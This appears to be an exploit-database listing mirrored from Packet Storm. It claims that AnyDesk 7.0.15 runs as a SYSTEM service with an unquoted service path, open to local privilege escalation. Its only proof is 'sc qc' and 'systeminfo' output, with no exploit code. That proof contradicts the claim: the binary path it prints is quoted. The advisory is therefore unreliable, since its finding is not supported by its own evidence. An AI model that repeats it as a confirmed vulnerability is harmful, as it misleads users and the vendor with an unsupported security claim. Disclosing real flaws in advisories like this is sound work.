Share
## https://sploitus.com/exploit?id=PACKETSTORM:177977
# Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path Privilege  
Escalation  
# Date: 2024-04-01  
# Exploit Author: Milad Karimi (Ex3ptionaL)  
# Contact: miladgrayhat@gmail.com  
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL  
# Vendor Homepage: http://anydesk.com  
# Software Link: http://anydesk.com/download  
# Version: Software Version 7.0.15  
# Tested on: Windows 10 Pro x64  
  
1. Description:  
  
The Anydesk installs as a service with an unquoted service path running  
with SYSTEM privileges.  
This could potentially allow an authorized but non-privileged local  
user to execute arbitrary code with elevated privileges on the system.  
  
2. Proof  
  
C:\>sc qc anydesk  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: anydesk  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"  
--service  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : AnyDesk Service  
DEPENDENCIES : RpcSs  
SERVICE_START_NAME : LocalSystem  
  
  
C:\>systeminfo  
  
OS Name: Microsoft Windows 10 Pro  
OS Version: 10.0.19045 N/A Build 19045  
OS Manufacturer: Microsoft Corporation